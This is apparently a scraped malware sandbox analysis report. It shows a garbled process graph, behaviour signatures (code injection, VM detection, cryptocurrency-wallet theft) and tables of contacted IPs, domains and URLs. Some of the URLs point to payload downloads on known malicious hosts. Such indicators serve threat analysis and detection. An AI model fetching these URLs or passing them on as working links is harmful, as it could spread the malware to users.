home.fvtekk5pn.top 26->100 86 C:\Users\user\...\unmYCIPOHmXNjqOesrEy.dll, PE32 26->86 dropped 88 C:\Users\user\AppData\...\service123.exe, PE32 26->88 dropped 146 Drops large PE files 26->146 156 2 other signatures 26->156 158 2 other signatures 29->158 102 prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 GOOGLEUS United States 31->102 104 127.0.0.1 unknown unknown 31->104 55 2 other processes 31->55 46 conhost.exe 33->46         started        48 conhost.exe 35->48         started        106 property-imper.sbs 104.21.33.116, 443, 49834, 49841 CLOUDFLARENETUS United States 37->106 148 Binary is likely a compiled AutoIt script file 37->148 150 Contains functionality to inject code into remote processes 37->150 152 Injects a PE file into a foreign processes 37->152 50 r5mqFEC.exe 37->50         started        53 taskkill.exe 37->53         started        57 7 other processes 37->57 59 3 other processes 39->59 file10 signatures11 process12 dnsIp13 114 239.255.255.250 unknown Reserved 41->114 61 chrome.exe 41->61         started        116 push-hook.cyou 104.21.10.6, 443, 49770, 49777 CLOUDFLARENETUS United States 50->116 120 Query firmware table information (likely to detect VMs) 50->120 122 Found many strings related to Crypto-Wallets (likely being stolen) 50->122 124 Tries to steal Crypto Currency Wallets 50->124 64 conhost.exe 53->64         started        66 conhost.exe 57->66         started        68 conhost.exe 57->68         started        70 conhost.exe 57->70         started        72 conhost.exe 57->72         started        signatures14 process15 dnsIp16 118 www.google.com 142.250.181.100 GOOGLEUS United States 61->118
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
104.21.10.6
 push-hook.cyou United States
13335 CLOUDFLARENETUS true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
142.250.181.100
 www.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
104.21.33.116
 property-imper.sbs United States
13335 CLOUDFLARENETUS false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
home.fvtekk5pn.top 34.116.198.130 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
property-imper.sbs 104.21.33.116 true
www.google.com 142.250.181.100 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
push-hook.cyou 104.21.10.6 true
fvtekk5pn.top 34.116.198.130 true
js.monitor.azure.com unknown unknown
detectportal.firefox.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    https://property-imper.sbs:443/api false
      		high
      http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
        		high
        https://property-imper.sbs/api false
          		high
          http://185.215.113.206/68b591d6548ec281/sqlite3.dll false
            		high
            http://185.215.113.16/steam/random.exe false
              		high
              CgPhome.fvtekk5pn.top true
              • Avira URL Cloud: malware
              		 unknown